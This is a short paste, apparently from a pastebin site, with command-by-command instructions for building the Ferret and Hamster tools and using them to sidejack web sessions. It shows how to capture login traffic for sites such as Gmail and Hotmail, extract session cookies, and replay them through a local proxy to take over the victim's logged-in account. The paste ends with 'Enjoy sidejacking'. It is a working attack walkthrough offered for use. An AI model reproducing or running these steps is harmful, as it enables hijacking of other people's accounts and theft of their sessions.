Ferret and Hamster

SUBMITTED BY: Guest

DATE: Dec. 6, 2013, 9:17 a.m.

FORMAT: Text only

SIZE: 1.6 kB

Raw Download

HITS: 1074

Report
  1. 1) Installing Ferret and Hamster
  3. sudo su
  4. apt-get install libpcap-dev
  5. -----if you don't have a [pentest folder make one]
  6. cd /
  7. mkdir pentest
  8. cd /pentest
  10. wget http://www.erratasec.com/erratasec.zip
  11. unzip erratasec.zip
  12. mv hamster hamster2
  13. cd hamster2/build/gcc4
  14. make
  15. cd /pentest/ferret/build/gcc4
  16. make
  17. cd /pentest
  18. mkdir hamster
  19. cp /pentest/ferret/bin/ferret /pentest/hamster
  20. cp /pentest/hamster2/bin/favicon.ico /pentest/hamster
  21. cp /pentest/hamster2/bin/hamster /pentest/hamster
  22. cp /pentest/hamster2/bin/hamster.css /pentest/hamster
  23. cp /pentest/hamster2/bin/hamster.js /pentest/hamster
  25. 2) Capture login credentials packets of any web login(gmail, hotmail etc) through wireshark and save the file as test.pcap under directory /pentest/hamster2/bin/
  27. 3) cd /pentest/hamster2/bin/
  29. 4) ./ferret -r test.pcap (Reads the mail id and necessary login credentials)
  31. 5) ./hamster (Starts hamster proxy server on http://127.0.0.1:1234
  33. 6) Configure your browser with proxy server as 127.0.0.1 and port as 1234
  35. 7) Type http://hamster in your browser.
  37. 8) Click on your IP at the bottom of the page that contains email id or any login name with which you logged into previous page while capturing packet earlier.
  39. 9) At the right pane, you can see several cookies, click one of them to recieve the logged in session of your earlier page. Now your session is hijacked and you can change anything inside the session.
  41. Enjoy sidejacking with ferret and hamster!!!!!
comments powered by Disqus